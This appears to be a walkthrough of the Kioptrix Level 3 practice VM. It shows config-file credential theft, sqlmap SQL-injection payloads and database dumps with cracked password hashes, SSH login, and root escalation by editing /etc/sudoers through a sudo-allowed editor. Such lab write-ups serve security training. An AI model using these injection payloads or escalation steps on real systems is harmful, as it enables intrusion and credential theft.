drwx------ 2 loneferret loneferret  4096 Apr 14  2011 .ssh
-rw-r--r-- 1 loneferret loneferret     0 Apr 11  2011 .sudo_as_admin_successful
-rw-r--r-- 1 root       root         224 Apr 16  2011 CompanyPolicy.README
-rwxrwxr-x 1 root       root       26275 Jan 12  2011 checksec.sh

A sudo user.

cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO

cat /etc/issue
DISCLAIMER!
We at Kioptrix are not responsible for any damaged directly, or indirectly, 
caused by using this system. We suggest you do not connect this installation
to the Internet. It is, after all, a vulnerable setup. 
Please keep this in mind when playing the game.

This machine is setup to use DHCP.
Before playing the game, please modify your attacker's hosts file.
<ip> kioptrix3.com
This challenge contains a Web Application.

If you have any questions, please direct them to:
comms[at]kioptrix.com
Hope you enjoy this challenge.
-Kioptrix Team

Ubuntu 8.04.3 LTS \n \l

cat /etc/debian_version
lenny/sid

uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

Something I missed at first, in the gallery config:
cat gconfig.php

<?php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/

// Installer Details -----------------------------------------------

// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash

$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";


http://kioptrix3.com/phpmyadmin/

 SELECT *
FROM `dev_accounts`
WHERE 1
LIMIT 0 , 30
Profiling [ Edit ] [ Explain SQL ] [ Create PHP Code ] [ Refresh ]

   
row(s) starting from record #
in
mode and repeat headers after cells   
Sort by key:
Full Texts id username password
Edit Delete 1 dreg 0d3eccfb887aabd50f243b3f155c0f85 <- Mast3r
Edit Delete 2 loneferret 5badcaf789d3d1d09794d8f021f40f0e <- starwars



Something even easier, I found in other reviews: 

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201606170a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 04:04:27

[04:04:27] [INFO] resuming back-end DBMS 'mysql' 
[04:04:27] [INFO] testing connection to the target URL
[04:04:27] [INFO] heuristics detected web page charset 'ISO-8859-2'
[04:04:27] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[04:04:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-9800 OR 6056=6056#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 AND (SELECT 1889 FROM(SELECT COUNT(*),CONCAT(0x716a767a71,(SELECT (ELT(1889=1889,1))),0x71766a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZmZi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x716a767a71,0x53636269564f6f6c6b59774151557a6b697471716664654755694a584468475268497a624f554d61,0x71766a6b71),NULL,NULL,NULL,NULL,NULL-- -
---
[04:04:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[04:04:27] [INFO] fetching database names
[04:04:28] [INFO] the SQL query used returns 3 entries
[04:04:28] [INFO] retrieved: information_schema
[04:04:28] [INFO] retrieved: gallery
[04:04:28] [INFO] retrieved: mysql
available databases [3]:                                                       
[*] gallery
[*] information_schema
[*] mysql

[04:04:28] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[04:04:28] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'


sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id --tables -D gallery
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201606170a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 04:08:55

[04:08:55] [INFO] resuming back-end DBMS 'mysql' 
[04:08:55] [INFO] testing connection to the target URL
[04:08:55] [INFO] heuristics detected web page charset 'ISO-8859-2'
[04:08:55] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[04:08:55] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-9800 OR 6056=6056#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 AND (SELECT 1889 FROM(SELECT COUNT(*),CONCAT(0x716a767a71,(SELECT (ELT(1889=1889,1))),0x71766a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZmZi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x716a767a71,0x53636269564f6f6c6b59774151557a6b697471716664654755694a584468475268497a624f554d61,0x71766a6b71),NULL,NULL,NULL,NULL,NULL-- -
---
[04:08:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[04:08:55] [INFO] fetching tables for database: 'gallery'
[04:08:55] [INFO] the SQL query used returns 7 entries
[04:08:56] [INFO] retrieved: dev_accounts
[04:08:56] [INFO] retrieved: gallarific_comments
[04:08:56] [INFO] retrieved: gallarific_galleries
[04:08:56] [INFO] retrieved: gallarific_photos
[04:08:56] [INFO] retrieved: gallarific_settings
[04:08:56] [INFO] retrieved: gallarific_stats
[04:08:56] [INFO] retrieved: gallarific_users
Database: gallery                                                                                  
[7 tables]
+----------------------+
| dev_accounts         |
| gallarific_comments  |
| gallarific_galleries |
| gallarific_photos    |
| gallarific_settings  |
| gallarific_stats     |
| gallarific_users     |
+----------------------+

[04:08:56] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[04:08:56] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 04:08:56

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id -T dev_accounts --dump
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201606170a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 03:32:50

[03:32:50] [INFO] testing connection to the target URL
[03:32:51] [INFO] heuristics detected web page charset 'ISO-8859-2'
[03:32:51] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[03:32:51] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[03:32:51] [INFO] testing if the target URL is stable
[03:32:52] [INFO] target URL is stable
[03:32:52] [INFO] heuristics detected web page charset 'ascii'
[03:32:52] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[03:32:52] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to XSS attacks
[03:32:52] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[03:33:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:33:11] [WARNING] reflective value(s) found and filtering out
[03:33:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[03:33:14] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[03:33:14] [INFO] GET parameter 'id' seems to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable
[03:33:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[03:33:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[03:33:14] [INFO] testing 'MySQL inline queries'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:33:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[03:33:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[03:33:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[03:33:24] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
[03:33:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[03:33:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[03:33:25] [INFO] target URL appears to be UNION injectable with 6 columns
[03:33:25] [WARNING] combined UNION/error-based SQL injection case found on column 2. sqlmap will try to find another column with better characteristics
[03:33:25] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[03:33:25] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 142 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-9800 OR 6056=6056#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 AND (SELECT 1889 FROM(SELECT COUNT(*),CONCAT(0x716a767a71,(SELECT (ELT(1889=1889,1))),0x71766a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZmZi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x716a767a71,0x53636269564f6f6c6b59774151557a6b697471716664654755694a584468475268497a624f554d61,0x71766a6b71),NULL,NULL,NULL,NULL,NULL-- -
---
[03:33:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[03:33:43] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[03:33:43] [INFO] fetching current database
[03:33:43] [INFO] fetching columns for table 'dev_accounts' in database 'gallery'
[03:33:43] [INFO] the SQL query used returns 3 entries
[03:33:43] [INFO] the SQL query used returns 3 entries                      
[03:33:43] [INFO] retrieved: id
[03:33:43] [INFO] retrieved: int(10)
[03:33:43] [INFO] retrieved: username
[03:33:43] [INFO] retrieved: varchar(50)
[03:33:43] [INFO] retrieved: password
[03:33:43] [INFO] retrieved: varchar(50)
[03:33:43] [INFO] fetching entries for table 'dev_accounts' in database 'gallery'
[03:33:43] [INFO] the SQL query used returns 2 entries
[03:33:44] [INFO] retrieved: "1","0d3eccfb887aabd50f243b3f155c0f85","dreg"
[03:33:44] [WARNING] automatically patching output having last char trimmed
[03:33:44] [INFO] retrieved: "2","5badcaf789d3d1d09794d8f021f40f0e","loneferret"
[03:33:44] [INFO] analyzing table dump for possible password hashes          
[03:33:44] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[03:33:56] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> /usr/share/wordlists/rockyou.txt.gz
[03:34:19] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[03:34:26] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[03:34:26] [INFO] starting 2 processes
[03:34:27] [INFO] cracked password 'Mast3r' for user 'dreg'                  
[03:34:30] [INFO] cracked password 'starwars' for user 'loneferret'          
[03:34:31] [INFO] postprocessing table dump                                  
Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username   | password                                    |
+----+------------+---------------------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+

[03:34:31] [INFO] table 'gallery.dev_accounts' dumped to CSV file '/root/.sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv'
[03:34:31] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 21 times
[03:34:31] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 03:34:31

ssh loneferret@kioptrix3.com
loneferret@kioptrix3.com's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$

sudo su
[sudo] password for loneferret: 
Sorry, user loneferret is not allowed to execute '/bin/su' as root on Kioptrix3.

export TERM=xterm
sudo ht

Shadow:
root:$1$QAKvVJey$6rRkAMGKq1u62yfDaenUr1:15082:0:99999:7::: 

Edit sudoers
# User privilege specification
│root    ALL=(ALL) ALL    
│loneferret ALL=(ALL) ALL

loneferret@Kioptrix3:/usr/local/bin$ sudo ht /etc/sudoers
loneferret@Kioptrix3:/usr/local/bin$ sudo su
[sudo] password for loneferret: 
root@Kioptrix3:/usr/local/bin# whoami
root
root@Kioptrix3:/usr/local/bin#


root@Kioptrix3:/usr/local/bin# cd /root
root@Kioptrix3:~# ls
Congrats.txt  ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone. 
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.


I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com


Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS: 
http://www.lotuscms.org

Gallery application: 
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/


Also, all pictures were taken from Google Images, so being part of the
public domain I used them.


Best Regards,
Yuriy Stanchev/URIX